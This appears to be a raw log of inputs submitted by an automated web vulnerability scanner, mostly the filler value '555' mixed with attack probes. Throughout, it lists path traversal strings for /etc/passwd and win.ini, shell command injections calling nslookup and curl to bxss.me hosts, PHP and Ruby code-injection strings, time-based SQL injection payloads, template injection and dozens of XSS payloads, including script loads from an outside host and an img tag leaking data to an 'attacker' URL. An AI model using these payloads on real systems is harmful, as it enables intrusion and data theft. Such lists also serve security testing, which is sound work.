555
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
../../../../../../../../../../../../../../windows/win.ini
echo snkhro$()\ qlpcef\nz^xyu||a #' &echo snkhro$()\ qlpcef\nz^xyu||a #|" &echo snkhro$()\ qlpcef\nz^xyu||a #
555
555
&echo nxckdz$()\ yomrzl\nz^xyu||a #' &echo nxckdz$()\ yomrzl\nz^xyu||a #|" &echo nxckdz$()\ yomrzl\nz^xyu||a #
555
file:///etc/passwd
555
555&echo napdok$()\ wbndbq\nz^xyu||a #' &echo napdok$()\ wbndbq\nz^xyu||a #|" &echo napdok$()\ wbndbq\nz^xyu||a #
555
555
${9999758+9999558}
../555
555
|echo nevagm$()\ utwmsq\nz^xyu||a #' |echo nevagm$()\ utwmsq\nz^xyu||a #|" |echo nevagm$()\ utwmsq\nz^xyu||a #
555
555
555
555|echo yzaemr$()\ hynvjt\nz^xyu||a #' |echo yzaemr$()\ hynvjt\nz^xyu||a #|" |echo yzaemr$()\ hynvjt\nz^xyu||a #
555
555
555
555
expr 9000747643 - 988914
555
555
555
555
555
(nslookup -q=cname hitnaklsliuua64750.bxss.me||curl hitnaklsliuua64750.bxss.me))
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
$(nslookup -q=cname hitufmohteevadb502.bxss.me||curl hitufmohteevadb502.bxss.me)
';print(md5(31337));$a='
555
555
&nslookup -q=cname hityavsrqpnttbdbf4.bxss.me&'\"`0&nslookup -q=cname hityavsrqpnttbdbf4.bxss.me&`'
";print(md5(31337));$a="
555
&(nslookup -q=cname hitsxufzufyuq8fce7.bxss.me||curl hitsxufzufyuq8fce7.bxss.me)&'\"`0&(nslookup -q=cname hitsxufzufyuq8fce7.bxss.me||curl hitsxufzufyuq8fce7.bxss.me)&`'
555
555
${@print(md5(31337))}
555
|(nslookup -q=cname hitsruankypty0a7a7.bxss.me||curl hitsruankypty0a7a7.bxss.me)
${@print(md5(31337))}\
'.gethostbyname(lc('hitwn'.'omviarntb7353.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(68).chr(101).chr(87).'
555
`(nslookup -q=cname hitincbhcbsflad926.bxss.me||curl hitincbhcbsflad926.bxss.me)`
'.print(md5(31337)).'
;(nslookup -q=cname hitrcpyjodalte1a8d.bxss.me||curl hitrcpyjodalte1a8d.bxss.me)|(nslookup -q=cname hitrcpyjodalte1a8d.bxss.me||curl hitrcpyjodalte1a8d.bxss.me)&(nslookup -q=cname hitrcpyjodalte1a8d.bxss.me||curl hitrcpyjodalte1a8d.bxss.me)
555
".gethostbyname(lc("hitnd"."hguplonkf86d8.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(76).chr(99).chr(80)."
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitljobhwgwdo89a8d.bxss.me||curl${IFS}hitljobhwgwdo89a8d.bxss.me)
555
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitrpdlkpohfz2a314.bxss.me||curl${IFS}hitrpdlkpohfz2a314.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitrpdlkpohfz2a314.bxss.me||curl${IFS}hitrpdlkpohfz2a314.bxss.me)&`'
gethostbyname(lc('hiton'.'fwyfwqzbc7399.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(88).chr(107).chr(75)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
555
555
555
555
bxss.me/t/xss.html?%00
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
555
555
/etc/shells
555
555
../../../../../../../../../../../../../../etc/shells
555
555
555
555
c:/windows/win.ini
555
555
555
555
555
bxss.me
555
555
555
Http://bxss.me/t/fit.txt
555
555
555
http://bxss.me/t/fit.txt?.jpg
555
555
555
"+"A".concat(70-3).concat(22*4).concat(99).concat(81).concat(111).concat(65)+(require"socket" Socket.gethostbyname("hitkz"+"bozpdkrr3331b.bxss.me.")[3].to_s)+"
555
555
'+'A'.concat(70-3).concat(22*4).concat(116).concat(90).concat(110).concat(90)+(require'socket' Socket.gethostbyname('hitzf'+'plaeyafv7e76c.bxss.me.')[3].to_s)+'
555
555
depoimentos
555
555
depoimentos�
'A'.concat(70-3).concat(22*4).concat(106).concat(84).concat(97).concat(65)+(require'socket' Socket.gethostbyname('hitjm'+'brwskegbd5aec.bxss.me.')[3].to_s)
555
555
depoimentos/.
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
redirtest.acx
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555&n936269=v962260
555
555
555
555
555
555
555
555
)
555
555
555
!(()&&!|*|*|
555
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555
555
555'&&sleep(27*1000)*arhdrn&&'
555
555"&&sleep(27*1000)*kisqud&&"
555
555
555
555
555
555'||sleep(27*1000)*kzodzn||'
555
555
555
555
555"||sleep(27*1000)*toghlz||"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555iOQE0Bzl
555
-1 OR 5*5=25 --
-1 OR 5*5=25
-1' OR 5*5=25 --
-1" OR 5*5=25 --
-1' OR 5*5=25 or 'H9xBvN2z'='
-1" OR 5*5=25 or "RzM0adJ0"="
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555kVyW7j4J'; waitfor delay '0:0:15' --
555-1 OR 968=(SELECT 968 FROM PG_SLEEP(15))--
555-1) OR 694=(SELECT 694 FROM PG_SLEEP(15))--
555-1)) OR 627=(SELECT 627 FROM PG_SLEEP(15))--
555r5I3IJES' OR 545=(SELECT 545 FROM PG_SLEEP(15))--
555rzeUMrNt') OR 186=(SELECT 186 FROM PG_SLEEP(15))--
555WMl7DlFl')) OR 540=(SELECT 540 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555????%2527%2522\'\"
@@F80dN
(select 198766*667891)
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
xfs.bxss.me
555
555
555
555
555
555
555
555
'"
555
555
555
555
555
555
<!--
555
555
555
555
555'"()&%<zzz><ScRiPt >LjGv(9115)</ScRiPt>
555
555
555
'"()&%<zzz><ScRiPt >LjGv(9507)</ScRiPt>
555
555
555
5559704552
555
555
12345'"\'\");|]*�{ <�>?''????
555
555
555
555
555
555
555
response.write(9416986*9252924)
555
555
'+response.write(9416986*9252924)+'
555
555
555
555
"+response.write(9416986*9252924)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
c7Gj9G85
555
555
ETNsrP8Z: CmCuST76
555
echo loiivd$()\ tjaznx\nz^xyu||a #' &echo loiivd$()\ tjaznx\nz^xyu||a #|" &echo loiivd$()\ tjaznx\nz^xyu||a #
555
555
555
&echo plcchy$()\ xiludb\nz^xyu||a #' &echo plcchy$()\ xiludb\nz^xyu||a #|" &echo plcchy$()\ xiludb\nz^xyu||a #
555
555
555&echo bmthyy$()\ revxxk\nz^xyu||a #' &echo bmthyy$()\ revxxk\nz^xyu||a #|" &echo bmthyy$()\ revxxk\nz^xyu||a #
555
555
|echo wqxbgy$()\ gqblxk\nz^xyu||a #' |echo wqxbgy$()\ gqblxk\nz^xyu||a #|" |echo wqxbgy$()\ gqblxk\nz^xyu||a #
555
555
555
555
555
555|echo ooyyuk$()\ cetpib\nz^xyu||a #' |echo ooyyuk$()\ cetpib\nz^xyu||a #|" |echo ooyyuk$()\ cetpib\nz^xyu||a #
555
555
expr 9000836510 - 932362
555
555
(nslookup -q=cname hitgxwmjlbocw946f9.bxss.me||curl hitgxwmjlbocw946f9.bxss.me))
555
../../../../../../../../../../../../../../etc/passwd
555
555
$(nslookup -q=cname hitmuoyzhoyca3af14.bxss.me||curl hitmuoyzhoyca3af14.bxss.me)
../../../../../../../../../../../../../../windows/win.ini
555
555
&nslookup -q=cname hitdzdlnxreyzb89f5.bxss.me&'\"`0&nslookup -q=cname hitdzdlnxreyzb89f5.bxss.me&`'
file:///etc/passwd
555
555
555
555
../555
&(nslookup -q=cname hitzcbznuciqs1d0b0.bxss.me||curl hitzcbznuciqs1d0b0.bxss.me)&'\"`0&(nslookup -q=cname hitzcbznuciqs1d0b0.bxss.me||curl hitzcbznuciqs1d0b0.bxss.me)&`'
555
555
555
555
555
555
|(nslookup -q=cname hitdqzbrfbfhtdf945.bxss.me||curl hitdqzbrfbfhtdf945.bxss.me)
555
555
`(nslookup -q=cname hitsiagydvpise4bc3.bxss.me||curl hitsiagydvpise4bc3.bxss.me)`
555
555
;(nslookup -q=cname hitzuolovgpyy8090e.bxss.me||curl hitzuolovgpyy8090e.bxss.me)|(nslookup -q=cname hitzuolovgpyy8090e.bxss.me||curl hitzuolovgpyy8090e.bxss.me)&(nslookup -q=cname hitzuolovgpyy8090e.bxss.me||curl hitzuolovgpyy8090e.bxss.me)
555
555
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitqqxsgngpkx21f5c.bxss.me||curl${IFS}hitqqxsgngpkx21f5c.bxss.me)
555
555
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitnqxldgtjvt46647.bxss.me||curl${IFS}hitnqxldgtjvt46647.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitnqxldgtjvt46647.bxss.me||curl${IFS}hitnqxldgtjvt46647.bxss.me)&`'
555
555
555
555
${9999000+9999320}
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitah'.'xwehuazd49d1b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(74).chr(119).chr(71).'
555
555
".gethostbyname(lc("hitta"."jztnhkrze7f09.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(68).chr(122).chr(66)."
555
555
555
gethostbyname(lc('hitzg'.'iprpautdb2fff.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(83).chr(105).chr(81)
555
555
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
';print(md5(31337));$a='
555
555
";print(md5(31337));$a="
555
555
${@print(md5(31337))}
555
555
${@print(md5(31337))}\
555
555
555
555
'.print(md5(31337)).'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
555
555
555
555
555
555
555
bxss.me/t/xss.html?%00
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
"+"A".concat(70-3).concat(22*4).concat(115).concat(81).concat(113).concat(86)+(require"socket" Socket.gethostbyname("hitlu"+"cmvzlwcs35ae9.bxss.me.")[3].to_s)+"
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
555
555
'+'A'.concat(70-3).concat(22*4).concat(99).concat(71).concat(109).concat(83)+(require'socket' Socket.gethostbyname('hitqk'+'ahdqehph0bf1a.bxss.me.')[3].to_s)+'
555
555
'A'.concat(70-3).concat(22*4).concat(99).concat(72).concat(106).concat(74)+(require'socket' Socket.gethostbyname('hitju'+'jzllfxnq3750d.bxss.me.')[3].to_s)
/etc/shells
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/shells
555
555
555
c:/windows/win.ini
555
555
bxss.me
555
Http://bxss.me/t/fit.txt
555
http://bxss.me/t/fit.txt?.jpg
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
depoimentos
555
555
555
555
555
depoimentos�
555
555
555
555
555
depoimentos/.
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
redirtest.acx
555
555
555
555
555&n931724=v976537
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)
555
555
555
555
!(()&&!|*|*|
555
555
555
555
555
555
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555
555
555
555'&&sleep(27*1000)*lgmcnu&&'
555
555
555
555"&&sleep(27*1000)*uxblio&&"
555
555
555'||sleep(27*1000)*ikyznp||'
555
555
555
555"||sleep(27*1000)*udwjdg||"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555Nu9bySTR
555
555
-1 OR 5*5=25 --
555
-1 OR 5*5=25
-1' OR 5*5=25 --
-1" OR 5*5=25 --
-1' OR 5*5=25 or 'QxPS49S3'='
-1" OR 5*5=25 or "Xooacg7G"="
555
555*if(now()=sysdate(),sleep(15),0)
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
555
555
555
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
555
555
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555-1; waitfor delay '0:0:15' --
555
555-1); waitfor delay '0:0:15' --
555
555-1 waitfor delay '0:0:15' --
555
555dBJHr1v1'; waitfor delay '0:0:15' --
555
555-1 OR 333=(SELECT 333 FROM PG_SLEEP(15))--
555
555-1) OR 768=(SELECT 768 FROM PG_SLEEP(15))--
555
555-1)) OR 37=(SELECT 37 FROM PG_SLEEP(15))--
555
555ycR2DDVQ' OR 777=(SELECT 777 FROM PG_SLEEP(15))--
555
555GW1Lbrk0') OR 360=(SELECT 360 FROM PG_SLEEP(15))--
555
555
555
555
555zyb7CwR1')) OR 706=(SELECT 706 FROM PG_SLEEP(15))--
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555
555????%2527%2522\'\"
@@wxgNR
(select 198766*667891)
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
xfs.bxss.me
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"
555
555
<!--
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >Pjot(9144)</ScRiPt>
12345'"\'\");|]*�{ <�>?''????
555
'"()&%<zzz><ScRiPt >Pjot(9991)</ScRiPt>
555
5559546279
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9668508*9216243)
'+response.write(9668508*9216243)+'
555
555
"+response.write(9668508*9216243)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
ZTw2Ij0J
echo iudxbj$()\ qbozng\nz^xyu||a #' &echo iudxbj$()\ qbozng\nz^xyu||a #|" &echo iudxbj$()\ qbozng\nz^xyu||a #
Gd63jIQn: m3vikrmt
555
&echo sczqjp$()\ prphco\nz^xyu||a #' &echo sczqjp$()\ prphco\nz^xyu||a #|" &echo sczqjp$()\ prphco\nz^xyu||a #
555
555
555&echo xnrvnv$()\ pgfcif\nz^xyu||a #' &echo xnrvnv$()\ pgfcif\nz^xyu||a #|" &echo xnrvnv$()\ pgfcif\nz^xyu||a #
555
555
|echo rkmnom$()\ asomap\nz^xyu||a #' |echo rkmnom$()\ asomap\nz^xyu||a #|" |echo rkmnom$()\ asomap\nz^xyu||a #
555
555|echo jxgnub$()\ ltkqkj\nz^xyu||a #' |echo jxgnub$()\ ltkqkj\nz^xyu||a #|" |echo jxgnub$()\ ltkqkj\nz^xyu||a #
555
555
expr 9000760790 - 974106
555
(nslookup -q=cname hitmigfbwxffgc7087.bxss.me||curl hitmigfbwxffgc7087.bxss.me))
555
555
$(nslookup -q=cname hitjgguqbmxeb08044.bxss.me||curl hitjgguqbmxeb08044.bxss.me)
555
555
555
&nslookup -q=cname hitmnhslavhnz341fb.bxss.me&'\"`0&nslookup -q=cname hitmnhslavhnz341fb.bxss.me&`'
555
&(nslookup -q=cname hitwzziyqavnvc1f6c.bxss.me||curl hitwzziyqavnvc1f6c.bxss.me)&'\"`0&(nslookup -q=cname hitwzziyqavnvc1f6c.bxss.me||curl hitwzziyqavnvc1f6c.bxss.me)&`'
555
555
555
|(nslookup -q=cname hithaxhqcvmgb14b6c.bxss.me||curl hithaxhqcvmgb14b6c.bxss.me)
555
555
555
`(nslookup -q=cname hitfofifzmcrz16423.bxss.me||curl hitfofifzmcrz16423.bxss.me)`
555
555
555
;(nslookup -q=cname hitohkunuxaobbb35e.bxss.me||curl hitohkunuxaobbb35e.bxss.me)|(nslookup -q=cname hitohkunuxaobbb35e.bxss.me||curl hitohkunuxaobbb35e.bxss.me)&(nslookup -q=cname hitohkunuxaobbb35e.bxss.me||curl hitohkunuxaobbb35e.bxss.me)
555
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitsodpplzkmf33d06.bxss.me||curl${IFS}hitsodpplzkmf33d06.bxss.me)
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitjvpxrkfuyef77f4.bxss.me||curl${IFS}hitjvpxrkfuyef77f4.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitjvpxrkfuyef77f4.bxss.me||curl${IFS}hitjvpxrkfuyef77f4.bxss.me)&`'
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555<esi:include src="http://bxss.me/rpb.png"/>
file:///etc/passwd
555
555
555
555
555
555
555
555
../555
555
555
555
${9999639+10000172}
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
'.gethostbyname(lc('hitpf'.'dkvryrzbad233.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(65).chr(119).chr(66).'
';print(md5(31337));$a='
555
555
555
555
".gethostbyname(lc("hittr"."dzalrvbna528a.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(71).chr(98).chr(72)."
555
555
gethostbyname(lc('hitwy'.'wmptpnprfa94a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(81).chr(117).chr(71)
";print(md5(31337));$a="
555
555
555
${@print(md5(31337))}
555
555
555
555
${@print(md5(31337))}\
555
555
555
555
555
'.print(md5(31337)).'
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
555
555
555
555
555
555
/etc/shells
555
HttP://bxss.me/t/xss.html?%00
555
555
bxss.me/t/xss.html?%00
../../../../../../../../../../../../../../etc/shells
555
555
555
555
555
c:/windows/win.ini
555
555
555
555
bxss.me
555
555
555
Http://bxss.me/t/fit.txt
555
555
http://bxss.me/t/fit.txt?.jpg
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
redirtest.acx
"+"A".concat(70-3).concat(22*4).concat(118).concat(78).concat(113).concat(75)+(require"socket" Socket.gethostbyname("hitps"+"ylmpvmkffe788.bxss.me.")[3].to_s)+"
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(114).concat(71).concat(97).concat(70)+(require'socket' Socket.gethostbyname('hittv'+'wexhzycab37cf.bxss.me.')[3].to_s)+'
555
555
555
555
'A'.concat(70-3).concat(22*4).concat(112).concat(83).concat(98).concat(67)+(require'socket' Socket.gethostbyname('hiten'+'oexvuzmf6815e.bxss.me.')[3].to_s)
depoimentos
555
555
555
555
555
depoimentos�
555
555
555
555
depoimentos/.
555
555
555&n972551=v958216
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)
555
555
555
555
555
555
!(()&&!|*|*|
555
555
555
555
555
555
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555
555
555
555
555
555'&&sleep(27*1000)*gatcrl&&'
555
555
555
555"&&sleep(27*1000)*xjgmsu&&"
555
555
555'||sleep(27*1000)*gqmxfs||'
555
555
555
555"||sleep(27*1000)*vhnyuj||"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555EZ1GrxYN
555
555
555
555
555
555
555
555
555
-1 OR 5*5=25 --
555
-1 OR 5*5=25
-1' OR 5*5=25 --
-1" OR 5*5=25 --
-1' OR 5*5=25 or '0o421V4q'='
-1" OR 5*5=25 or "PcKY7BwD"="
555
555
555*if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
555
555
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
555-1; waitfor delay '0:0:15' --
555
555
555-1); waitfor delay '0:0:15' --
555
555
555-1 waitfor delay '0:0:15' --
555
555
555wOeBWEEb'; waitfor delay '0:0:15' --
555
555
555-1 OR 304=(SELECT 304 FROM PG_SLEEP(15))--
555
555
555-1) OR 603=(SELECT 603 FROM PG_SLEEP(15))--
555
555
555-1)) OR 52=(SELECT 52 FROM PG_SLEEP(15))--
555
555
555arJZ0TAI' OR 882=(SELECT 882 FROM PG_SLEEP(15))--
555
555
555owl5Goyq') OR 21=(SELECT 21 FROM PG_SLEEP(15))--
555
555
555V6LchbOB')) OR 282=(SELECT 282 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555'"
555????%2527%2522\'\"
@@92xRL
(select 198766*667891)
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >F3Uf(9880)</ScRiPt>
555
555
'"()&%<zzz><ScRiPt >F3Uf(9036)</ScRiPt>
555
555
5559277194
555
555
555
555
555
bfg5861?s1?s2?s3?hjl5861
555
bfgx7132??z1??z2a?bcxhjl7132
555
555
<%={{={@{#{${dfb}}%>
555
555
555
<th:t="${dfb}#foreach
555
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555
555
dfb{{98991*97996}}xca
555
555
555
dfb[[${98991*97996}]]xca
555
555
555
dfb__${98991*97996}__::.x
555
555
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
555
555
555<ScRiPt >F3Uf(9671)</ScRiPt>
555
555
555
555<WFDJGZ>WMD6J[!+!]</WFDJGZ>
555
555
555
555
555<script>F3Uf(9426)</script>
555
555
555<script>F3Uf(9389)</script>9389
555
555
555
555
555
555<ScR<ScRiPt>IpT>F3Uf(9736)</sCr<ScRiPt>IpT>
555
555
555
555<ScRiPt >F3Uf(9680)</ScRiPt>
555
555
555
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9607></ScRiPt>
555
555
555
555<�ScRiPt >F3Uf(9295)</ScRiPt>
555
555
555
555<svg ?�onload=F3Uf(9882);>
555
555
555
555<isindex type=image src=1 onerror=F3Uf(9800)>
555
555
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9718'>
555
555
555
555<body onload=F3Uf(9367)>
555
555
555<img src=//xss.bxss.me/t/dot.gif onload=F3Uf(9968)>
555
555
555
555<img src=xyz OnErRor=F3Uf(9571)>
555
555
555
555
555
555<img/src=">" onerror=alert(9047)>
555
555
555
555
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%46%33%55%66%289789%29%3C%2F%73%43%72%69%70%54%3E
555
555
555
555\u003CScRiPt\F3Uf(9551)\u003C/sCripT\u003E
555
555
555
555<ScRiPt>F3Uf(9671)</sCripT>
555
555
555
?<img zzz onmouseover=F3Uf(98871) //?>
555
555
555
555<input autofocus onfocus=F3Uf(9907)>
555
555
<a HrEF=http://xss.bxss.me></a>
555
555
555
<a HrEF=jaVaScRiPT:>
555
555
555}body{zzz:Expre/**/SSion(F3Uf(9647))}
555
555
555
555yr7c3 <ScRiPt >F3Uf(9447)</ScRiPt>
555
555
555<WOPWA8>QX6QZ[!+!]</WOPWA8>
555
555
555
555<ifRAme sRc=9629.com></IfRamE>
555
555
555
555
555
555<aW0dj2f x=9322>
555
555
555
555<img sRc='http://attacker-9430/log.php?
555
555
555
555<aOiTBer<
555
555
555
555
